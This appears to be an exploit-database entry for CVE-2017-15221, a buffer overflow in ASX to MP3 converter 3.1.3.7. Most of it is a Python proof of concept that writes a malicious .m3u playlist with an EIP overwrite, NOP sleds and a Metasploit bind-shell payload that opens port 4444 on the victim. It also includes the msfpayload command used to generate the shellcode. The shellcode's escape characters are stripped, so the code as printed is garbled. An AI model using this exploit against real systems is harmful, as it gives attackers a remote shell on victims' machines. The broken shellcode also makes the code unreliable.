ASX To MP3 3.1.3.7 Buffer Overflow

# Exploit Title: Buffer Overflow via crafted malicious .m3u file


# Exploit Author: Parichay Rai

# Tested on: XP Service Pack 3

# CVE : CVE-2017-15221
# Exploit Title: Buffer Overflow via crafted malicious .m3u file


# Exploit Author: Parichay Rai

# Tested on: XP Service Pack 3

# CVE : CVE-2017-15221

Description
------------

A buffer overflow Attack possible due to improper input mechanism

Proof of Concept
----------------

#!/usr/bin/python

#This exploit generates a malicious playlist for the asx to mp3 converter 3.1.3.7.2010.
#This is an exploit that work well against a windows XP3 systems!
#Successful exploit gives you a bind shell on 4444

BadChar= "x00x0ax0dx20"

# Payload Generation Command: msfpayload windows/shell_bind_tcp EXITFUNC=none R | msfencode -a x86 -b "x00x0ax0dx20" -f c

# Successful exploitation opens port 4444 on the victim Machine

shellcode=("xd9xeexbfxadx07x92x3exd9x74x24xf4x5ex2bxc9" +
"xb1x56x31x7ex18x03x7ex18x83xc6xa9xe5x67xc2" +
"x59x60x87x3bx99x13x01xdexa8x01x75xaax98x95" +
"xfdxfex10x5dx53xebxa3x13x7cx1cx04x99x5ax13" +
"x95x2fx63xffx55x31x1fx02x89x91x1excdxdcxd0" +
"x67x30x2ex80x30x3ex9cx35x34x02x1cx37x9ax08" +
"x1cx4fx9fxcfxe8xe5x9ex1fx40x71xe8x87xebxdd" +
"xc9xb6x38x3ex35xf0x35xf5xcdx03x9fxc7x2ex32" +
"xdfx84x10xfaxd2xd5x55x3dx0cxa0xadx3dxb1xb3" +
"x75x3fx6dx31x68xe7xe6xe1x48x19x2bx77x1ax15" +
"x80xf3x44x3ax17xd7xfex46x9cxd6xd0xcexe6xfc" +
"xf4x8bxbdx9dxadx71x10xa1xaexdexcdx07xa4xcd" +
"x1ax31xe7x99xefx0cx18x5ax67x06x6bx68x28xbc" +
"xe3xc0xa1x1axf3x27x98xdbx6bxd6x22x1cxa5x1d" +
"x76x4cxddxb4xf6x07x1dx38x23x87x4dx96x9bx68" +
"x3ex56x4bx01x54x59xb4x31x57xb3xc3x75x99xe7" +
"x80x11xd8x17x37xbex55xf1x5dx2ex30xa9xc9x8c" +
"x67x62x6exeex4dxdex27x78xd9x08xffx87xdax1e" +
"xacx24x72xc9x26x27x47xe8x39x62xefx63x02xe5" +
"x65x1axc1x97x7ax37xb1x34xe8xdcx41x32x11x4b" +
"x16x13xe7x82xf2x89x5ex3dxe0x53x06x06xa0x8f" +
"xfbx89x29x5dx47xaex39x9bx48xeax6dx73x1fxa4" +
"xdbx35xc9x06xb5xefxa6xc0x51x69x85xd2x27x76" +
"xc0xa4xc7xc7xbdxf0xf8xe8x29xf5x81x14xcaxfa" +
"x58x9dxa0xc0x80xbfxdcx6cxd1xfdx80x8ex0cxc1" +
"xbcx0cxa4xbax3ax0cxcdxbfx07x8ax3exb2x18x7f" +
"x40x61x18xaa")

buffer="http://"
buffer+="A"*17417
buffer+="x53x93x42x7e" #(overwrites EIP in windows XP service pack 3 with the address of user32.dll)
buffer+="x90"*10 #NOPs
buffer+=shellcode
buffer+="x90"*10 #NOPs
f=open("exploit.m3u","w")
f.write(buffer);
f.close()

----------------------
Affected Targets
---------------------

ASX to MP3 version 3.1.3.7 and May be less


Solution
---------------

Validate input to prevent unexpected data from being processed, such as being too long, of the wrong data type, containing "junk" characters, etc.


Credits
----------

Offensive Security
Rebellious Ceaser